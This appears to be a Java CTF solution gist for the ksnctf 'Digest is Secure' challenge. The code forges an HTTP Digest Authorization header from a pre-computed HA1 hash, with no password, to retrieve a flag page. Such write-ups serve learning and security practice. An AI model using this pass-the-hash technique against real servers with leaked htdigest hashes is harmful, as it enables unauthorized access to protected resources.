Created
November 22, 2016 06:37
CTF-Digest is Secure!!
import java.io.IOException; | |
import java.io.InputStream; | |
import java.net.HttpURLConnection; | |
import java.net.URL; | |
import java.util.Map; | |
import org.apache.commons.codec.digest.DigestUtils; | |
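/**
 * Performs one HTTP Digest (MD5, qop=auth) request against a fixed URL and prints the body.
 *
 * <p>The Digest response is derived from {@code hasha1} alone; the cleartext password never
 * appears in this computation. In RFC 2617 Digest, HA1 is MD5(username:realm:password), so a
 * stored HA1 value (for example an htdigest entry) is password-equivalent and has to be
 * protected like the password itself. The request also travels over plain HTTP, so the
 * challenge and the response are visible to anyone on the network path.
 */
public class Main {

    /** Matches the {@code nonce="..."} parameter of a challenge without matching e.g. {@code cnonce}. */
    private static final java.util.regex.Pattern NONCE_PARAM =
            java.util.regex.Pattern.compile("(?i)(?:^|[\\s,])nonce\\s*=\\s*\"([^\"]*)\"");

    /**
     * Fetches the server challenge, computes the Digest response and requests the page again
     * with an Authorization header.
     *
     * @param args unused
     * @throws IOException if either HTTP exchange fails (including a non-2xx final status)
     */
    public static void main(String[] args) throws IOException {
        String user = "q9";
        String realm = "secret";
        String uri = "/~q9/flag.html";
        String method = "GET";
        // Pre-computed HA1; used as-is in the response hash below.
        String hasha1 = "c627e19450db746b739f41b64097d449";
        String a2 = method + ":" + uri;
        String nc = "00000001";
        String cnonce = "9691c249745d94fc";
        String qop = "auth";

        // First request carries no credentials; only its response headers are read.
        URL url = new URL("http://ksnctf.sweetduet.info:10080" + uri);
        HttpURLConnection connection = (HttpURLConnection) url.openConnection();
        Map<String, java.util.List<String>> map = connection.getHeaderFields();

        // The server-issued nonce comes from the WWW-Authenticate challenge.
        String nonce = getNonce(map);

        // HA2 = MD5(method:uri)
        String hasha2 = MD5(a2);
        // response = MD5(HA1:nonce:nc:cnonce:qop:HA2)
        String hx_response =
                MD5(hasha1 + ":" + nonce + ":" + nc + ":" + cnonce + ":" + qop + ":" + hasha2);

        // Second request: the header is built from the same variables that went into the hash,
        // so the values sent can never drift from the values that were hashed.
        // NOTE(review): RFC 2617 defines username, realm, nonce, uri, response and cnonce as
        // quoted-strings; they are sent unquoted here, which only lenient servers accept.
        connection = (HttpURLConnection) url.openConnection();
        connection.setRequestMethod(method);
        connection.setRequestProperty(
                "Authorization",
                "Digest username=" + user
                        + ", realm=" + realm
                        + ", nonce=" + nonce
                        + ", uri=" + uri
                        + ", algorithm=MD5, response=" + hx_response
                        + ", qop=" + qop
                        + ", nc=" + nc
                        + ", cnonce=" + cnonce);
        connection.connect();

        // Collect the whole body first: only the bytes actually read are kept, and decoding
        // once avoids splitting a multi-byte character at a buffer boundary.
        java.io.ByteArrayOutputStream body = new java.io.ByteArrayOutputStream();
        try (InputStream in = connection.getInputStream()) {
            byte[] buffer = new byte[1024];
            int read;
            while ((read = in.read(buffer)) != -1) {
                body.write(buffer, 0, read);
            }
        }
        // Explicit charset instead of the platform default; assumes the page is UTF-8 compatible.
        System.out.println(
                new String(body.toByteArray(), java.nio.charset.StandardCharsets.UTF_8));
    }

    /**
     * Returns the lowercase hexadecimal MD5 digest of {@code string}.
     *
     * <p>MD5 is used because the Digest exchange above declares {@code algorithm=MD5}.
     *
     * @param string text to hash
     * @return hex-encoded MD5 digest
     */
    public static String MD5(String string) {
        return DigestUtils.md5Hex(string);
    }

    /**
     * Extracts the nonce from the {@code WWW-Authenticate} challenge of a 401 response.
     *
     * <p>The header name is compared case-insensitively and the nonce is located by its
     * parameter name rather than by its position in the challenge.
     *
     * @param map response header fields, as returned by {@link HttpURLConnection#getHeaderFields()}
     * @return the nonce value without its surrounding quotes
     * @throws IllegalStateException if no challenge with a quoted nonce is present
     */
    public static String getNonce(Map<String, java.util.List<String>> map) {
        if (map == null) {
            throw new IllegalStateException("no response headers available");
        }
        for (Map.Entry<String, java.util.List<String>> header : map.entrySet()) {
            // The status line is stored under a null key; equalsIgnoreCase(null) is false.
            if (!"WWW-Authenticate".equalsIgnoreCase(header.getKey())
                    || header.getValue() == null) {
                continue;
            }
            for (String challenge : header.getValue()) {
                if (challenge == null) {
                    continue;
                }
                java.util.regex.Matcher matcher = NONCE_PARAM.matcher(challenge);
                if (matcher.find()) {
                    String noncekey = matcher.group(1);
                    System.out.println("nonce:" + noncekey); // nonce received from the server
                    return noncekey;
                }
            }
        }
        throw new IllegalStateException("no nonce found in a WWW-Authenticate header");
    }
}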